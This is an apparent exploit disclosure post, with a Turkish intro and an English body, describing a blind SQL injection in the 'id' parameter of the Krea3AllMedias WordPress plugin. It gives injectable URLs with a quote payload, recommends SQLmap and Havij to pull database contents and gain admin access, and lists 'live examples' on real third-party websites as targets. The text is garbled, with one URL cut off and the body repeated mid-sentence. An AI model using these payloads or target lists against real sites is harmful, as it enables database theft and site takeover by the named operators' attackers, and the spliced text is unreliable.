WordPress Plugins – Krea3AllMedias Eklentisinde SQL injection açığı bulundu. Açık sayesinde MYSQL veritabanına bağlanılarak veriler çekilebiliniyor. Açığın bulunduğu dizinler aşağıdaki gibidir
____________________________________
Krea3AllMedias WordPress Plugin is prone to an SQL Injection Vulnerability that can be exploited using an automated program . The ‘id’ parameter cannot be injected manually because it’s impossible to detect the infected column with a Union+Select Request . Simply Because nothing is displayed in the webpage . So using an Automated tool can easily help you to inject DATA from the website and get admin access.
I recommend you using : SQLmap for Linux & Havij For Windows .
‘id’ parameter is injectable in playlist.php , LineGallery.php , ArtGallery.php .
Examples :
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1′ http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1′ http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=1′
Live Examples :
http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5 http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3AllMedias WordPress Plugin is prone to an SQL Injection Vulnerability that can be exploited using an automated program . The ‘id’ parameter cannot be injected manually because it’s impossible to detect the infected column with a Union+Select Request . Simply Because nothing is displayed in the webpage . So using an Automated tool can easily help you to inject DATA from the website and get admin access.
I recommend you using : SQLmap for Linux & Havij For Windows .
‘id’ parameter is injectable in playlist.php , LineGallery.php , ArtGallery.php .
Examples :
http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1′ http://www.example.com/wp-content/plugins/Krea3Allmedias/application/services/premium/ArtGallery.php?id=1′
Live Examples :
http://www.krea3.fr/wp-content/plugins/Krea3Allmedias/application/services/premium/LineGallery.php?id=5 http://www.restaurant-honfleur-alcyone.fr/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1 http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
Admin Panel :
http://www.example.com/wp-admin /application/services/playlist.php?id=1 http://www.beuzeville-tourisme.com/wp-content/plugins/Krea3Allmedias/application/services/playlist.php?id=1
Admin Panel :
http://www.example.com/wp-admin